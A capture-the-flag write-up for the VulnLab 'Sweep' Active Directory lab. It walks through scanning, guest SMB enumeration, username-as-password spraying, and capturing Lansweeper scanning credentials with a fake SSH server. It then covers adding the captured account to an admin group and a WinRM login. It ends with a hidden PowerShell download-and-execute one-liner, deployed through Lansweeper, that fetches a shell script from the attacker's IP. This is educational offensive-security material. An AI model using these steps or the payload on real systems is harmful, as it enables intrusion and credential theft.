VulnLab Sweep
VulnLab Sweep
VulnLab Sweep
Sweep
Recon
1
2
└─$ rustscan -g -a 10.10.93.210 -r 1-65535
10.10.93.210 -> [53,81,82,88,135,139,389,445,464,593,636,3389,3269,3268,5357,5985,9389,49664,49670,49676,49675,49682,49715]
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
└─$ nmap -sC -sV -p53,81,82,88,135,139,389,445,464,593,636,3389,3269,3268,5357,5985,9389,49664,49670,49676,49675,49682,49715 10.10.93.210
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-22 17:48 +05
Nmap scan report for 10.10.93.210
Host is up (0.089s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
81/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-title: Lansweeper - Login
|_Requested resource was /login.aspx
82/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-title: Lansweeper - Login
|_Requested resource was /login.aspx
| tls-alpn:
|_ http/1.1
| ssl-cert: Subject: commonName=Lansweeper Secure Website
| Subject Alternative Name: DNS:localhost, DNS:localhost, DNS:localhost
| Not valid before: 2021-11-21T09:22:27
|_Not valid after: 2121-12-21T09:22:27
|_ssl-date: TLS randomness does not represent time
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-12-22 12:47:07Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sweep.vl0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ldapssl?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sweep.vl0., Site: Default-First-Site-Name)
3269/tcp open globalcatLDAPssl?
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-12-22T12:48:46+00:00; -1m18s from scanner time.
| ssl-cert: Subject: commonName=inventory.sweep.vl
| Not valid before: 2024-12-21T12:43:21
|_Not valid after: 2025-06-22T12:43:21
| rdp-ntlm-info:
| Target_Name: SWEEP
| NetBIOS_Domain_Name: SWEEP
| NetBIOS_Computer_Name: INVENTORY
| DNS_Domain_Name: sweep.vl
| DNS_Computer_Name: inventory.sweep.vl
| DNS_Tree_Name: sweep.vl
| Product_Version: 10.0.20348
|_ System_Time: 2024-12-22T12:48:04+00:00
5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Service Unavailable
|_http-server-header: Microsoft-HTTPAPI/2.0
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49664/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
49675/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49676/tcp open msrpc Microsoft Windows RPC
49682/tcp open msrpc Microsoft Windows RPC
49715/tcp open msrpc Microsoft Windows RPC
Service Info: Host: INVENTORY; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: -1m17s, deviation: 0s, median: -1m18s
| smb2-time:
| date: 2024-12-22T12:48:08
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 110.21 seconds
User
Nothing with anonymous bind in LDAP, but we have some results in SMB
1
2
3
4
5
6
7
8
9
10
11
12
13
└─$ nxc smb 10.10.93.210 -u 'guest' -p '' --shares
SMB 10.10.93.210 445 INVENTORY [*] Windows Server 2022 Build 20348 x64 (name:INVENTORY) (domain:sweep.vl) (signing:True) (SMBv1:False)
SMB 10.10.93.210 445 INVENTORY [+] sweep.vl\guest:
SMB 10.10.93.210 445 INVENTORY [*] Enumerated shares
SMB 10.10.93.210 445 INVENTORY Share Permissions Remark
SMB 10.10.93.210 445 INVENTORY ----- ----------- ------
SMB 10.10.93.210 445 INVENTORY ADMIN$ Remote Admin
SMB 10.10.93.210 445 INVENTORY C$ Default share
SMB 10.10.93.210 445 INVENTORY DefaultPackageShare$ READ Lansweeper PackageShare
SMB 10.10.93.210 445 INVENTORY IPC$ READ Remote IPC
SMB 10.10.93.210 445 INVENTORY Lansweeper$ Lansweeper Actions
SMB 10.10.93.210 445 INVENTORY NETLOGON Logon server share
SMB 10.10.93.210 445 INVENTORY SYSVOL Logon server share
We found scripts in DefaultPackageShare, but nothing interesting inside. Let’s continue with rid-brute
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
└─$ nxc smb 10.10.93.210 -u 'guest' -p '' --rid-brute
SMB 10.10.93.210 445 INVENTORY [*] Windows Server 2022 Build 20348 x64 (name:INVENTORY) (domain:sweep.vl) (signing:True) (SMBv1:False)
SMB 10.10.93.210 445 INVENTORY [+] sweep.vl\guest:
SMB 10.10.93.210 445 INVENTORY 498: SWEEP\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 10.10.93.210 445 INVENTORY 500: SWEEP\Administrator (SidTypeUser)
SMB 10.10.93.210 445 INVENTORY 501: SWEEP\Guest (SidTypeUser)
SMB 10.10.93.210 445 INVENTORY 502: SWEEP\krbtgt (SidTypeUser)
SMB 10.10.93.210 445 INVENTORY 512: SWEEP\Domain Admins (SidTypeGroup)
SMB 10.10.93.210 445 INVENTORY 513: SWEEP\Domain Users (SidTypeGroup)
SMB 10.10.93.210 445 INVENTORY 514: SWEEP\Domain Guests (SidTypeGroup)
SMB 10.10.93.210 445 INVENTORY 515: SWEEP\Domain Computers (SidTypeGroup)
SMB 10.10.93.210 445 INVENTORY 516: SWEEP\Domain Controllers (SidTypeGroup)
SMB 10.10.93.210 445 INVENTORY 517: SWEEP\Cert Publishers (SidTypeAlias)
SMB 10.10.93.210 445 INVENTORY 518: SWEEP\Schema Admins (SidTypeGroup)
SMB 10.10.93.210 445 INVENTORY 519: SWEEP\Enterprise Admins (SidTypeGroup)
SMB 10.10.93.210 445 INVENTORY 520: SWEEP\Group Policy Creator Owners (SidTypeGroup)
SMB 10.10.93.210 445 INVENTORY 521: SWEEP\Read-only Domain Controllers (SidTypeGroup)
SMB 10.10.93.210 445 INVENTORY 522: SWEEP\Cloneable Domain Controllers (SidTypeGroup)
SMB 10.10.93.210 445 INVENTORY 525: SWEEP\Protected Users (SidTypeGroup)
SMB 10.10.93.210 445 INVENTORY 526: SWEEP\Key Admins (SidTypeGroup)
SMB 10.10.93.210 445 INVENTORY 527: SWEEP\Enterprise Key Admins (SidTypeGroup)
SMB 10.10.93.210 445 INVENTORY 553: SWEEP\RAS and IAS Servers (SidTypeAlias)
SMB 10.10.93.210 445 INVENTORY 571: SWEEP\Allowed RODC Password Replication Group (SidTypeAlias)
SMB 10.10.93.210 445 INVENTORY 572: SWEEP\Denied RODC Password Replication Group (SidTypeAlias)
SMB 10.10.93.210 445 INVENTORY 1000: SWEEP\INVENTORY$ (SidTypeUser)
SMB 10.10.93.210 445 INVENTORY 1101: SWEEP\DnsAdmins (SidTypeAlias)
SMB 10.10.93.210 445 INVENTORY 1102: SWEEP\DnsUpdateProxy (SidTypeGroup)
SMB 10.10.93.210 445 INVENTORY 1103: SWEEP\Lansweeper Admins (SidTypeGroup)
SMB 10.10.93.210 445 INVENTORY 1113: SWEEP\jgre808 (SidTypeUser)
SMB 10.10.93.210 445 INVENTORY 1114: SWEEP\bcla614 (SidTypeUser)
SMB 10.10.93.210 445 INVENTORY 1115: SWEEP\hmar648 (SidTypeUser)
SMB 10.10.93.210 445 INVENTORY 1116: SWEEP\jgar931 (SidTypeUser)
SMB 10.10.93.210 445 INVENTORY 1117: SWEEP\fcla801 (SidTypeUser)
SMB 10.10.93.210 445 INVENTORY 1118: SWEEP\jwil197 (SidTypeUser)
SMB 10.10.93.210 445 INVENTORY 1119: SWEEP\grob171 (SidTypeUser)
SMB 10.10.93.210 445 INVENTORY 1120: SWEEP\fdav736 (SidTypeUser)
SMB 10.10.93.210 445 INVENTORY 1121: SWEEP\jsmi791 (SidTypeUser)
SMB 10.10.93.210 445 INVENTORY 1122: SWEEP\hjoh690 (SidTypeUser)
SMB 10.10.93.210 445 INVENTORY 1123: SWEEP\svc_inventory_win (SidTypeUser)
SMB 10.10.93.210 445 INVENTORY 1124: SWEEP\svc_inventory_lnx (SidTypeUser)
SMB 10.10.93.210 445 INVENTORY 1125: SWEEP\intern (SidTypeUser)
SMB 10.10.93.210 445 INVENTORY 3101: SWEEP\Lansweeper Discovery (SidTypeGroup)
Let’s try guessing password by using username as password
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
└─$ nxc smb 10.10.93.210 -u users.list -p users.list --continue-on-success --no-bruteforce
SMB 10.10.93.210 445 INVENTORY [*] Windows Server 2022 Build 20348 x64 (name:INVENTORY) (domain:sweep.vl) (signing:True) (SMBv1:False)
SMB 10.10.93.210 445 INVENTORY [-] sweep.vl\Administrator:Administrator STATUS_LOGON_FAILURE
SMB 10.10.93.210 445 INVENTORY [-] sweep.vl\Guest:Guest STATUS_LOGON_FAILURE
SMB 10.10.93.210 445 INVENTORY [-] sweep.vl\jgre808:jgre808 STATUS_LOGON_FAILURE
SMB 10.10.93.210 445 INVENTORY [-] sweep.vl\bcla614:bcla614 STATUS_LOGON_FAILURE
SMB 10.10.93.210 445 INVENTORY [-] sweep.vl\hmar648:hmar648 STATUS_LOGON_FAILURE
SMB 10.10.93.210 445 INVENTORY [-] sweep.vl\jgar931:jgar931 STATUS_LOGON_FAILURE
SMB 10.10.93.210 445 INVENTORY [-] sweep.vl\fcla801:fcla801 STATUS_LOGON_FAILURE
SMB 10.10.93.210 445 INVENTORY [-] sweep.vl\jwil197:jwil197 STATUS_LOGON_FAILURE
SMB 10.10.93.210 445 INVENTORY [-] sweep.vl\grob171:grob171 STATUS_LOGON_FAILURE
SMB 10.10.93.210 445 INVENTORY [-] sweep.vl\fdav736:fdav736 STATUS_LOGON_FAILURE
SMB 10.10.93.210 445 INVENTORY [-] sweep.vl\jsmi791:jsmi791 STATUS_LOGON_FAILURE
SMB 10.10.93.210 445 INVENTORY [-] sweep.vl\hjoh690:hjoh690 STATUS_LOGON_FAILURE
SMB 10.10.93.210 445 INVENTORY [-] sweep.vl\svc_inventory_win:svc_inventory_win STATUS_LOGON_FAILURE
SMB 10.10.93.210 445 INVENTORY [-] sweep.vl\svc_inventory_lnx:svc_inventory_lnx STATUS_LOGON_FAILURE
SMB 10.10.93.210 445 INVENTORY [+] sweep.vl\intern:intern
SMB 10.10.93.210 445 INVENTORY [+] sweep.vl\:
We have a hit, let’s enumerate domain with bloodhound
1
2
3
└─$ bloodhound-python -d 'sweep.vl' -u 'intern' -p 'intern' -c all -ns 10.10.93.210 --zip
INFO: Found AD domain: sweep.vl
<SNIP>
We can also now read other shares as intern, but nothing interesting there. But we saw Lansweeper running on ports 81,82. We successfully login using intern creds
Looking around we find in Scanning -> Scanning credentials, svc_intentory_lnx credentials are saved without mapping. The user is a member of Remote Management Users group
We can try create a mapping to our attack box to capture the credentials. In order to do that, we can use fakessh. Then we create a new range where we specify our IP and map svc_intentory_lnx credentials
Now we deploy the scan
We receive connection with credentials
1
2
3
4
5
└─$ sudo docker run -it --rm -p 22:22 fffaraz/fakessh
2024/12/22 13:27:39.101050 10.10.93.210:60194
2024/12/22 13:27:46.388558 10.10.93.210:60206
2024/12/22 13:27:46.911487 10.10.93.210:60207
2024/12/22 13:27:47.296428 10.10.93.210:60207 SSH-2.0-RebexSSH_5.0.8372.0 svc_inventory_lnx <REDACTED>
We can add user to group
1
└─$ net rpc group addmem "Lansweeper Admins" "svc_inventory_lnx" -U SWEEP/svc_inventory_lnx%'<REDACTED>' -S 10.10.93.210
1
2
3
└─$ net rpc group members "Lansweeper Admins" -U SWEEP/svc_inventory_lnx%'<REDACTED>' -S 10.10.93.210
SWEEP\jgre808
SWEEP\svc_inventory_lnx
We can now evil-winrm to host
1
2
3
4
5
6
7
8
9
10
└─$ evil-winrm -u 'svc_inventory_lnx' -p '<REDACTED>' -i 10.10.93.210
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_inventory_lnx\Documents>
Root
Since we added user to Lansweeper Admins group, svc_inventory_lnx has more privileges in Lansweeper dashboard
We can now deploy packages. Create a new package and add step
We set the following payload in the command window
1
powershell.exe -nop -w hidden -ep bypass -c IEX(New-Object Net.WebClient).DownloadString('http://10.8.4.147/shell.txt');
Now, we need to map the credentials to our target
After mapping we can deploy the package by clicking Deploy now and selecting our target
We receive our shell
https://api.vulnlab.com/api/v1/share?id=99895046-cd49-4b72-9a6c-c7827d3a7221
This post is licensed under CC BY 4.0 by the author.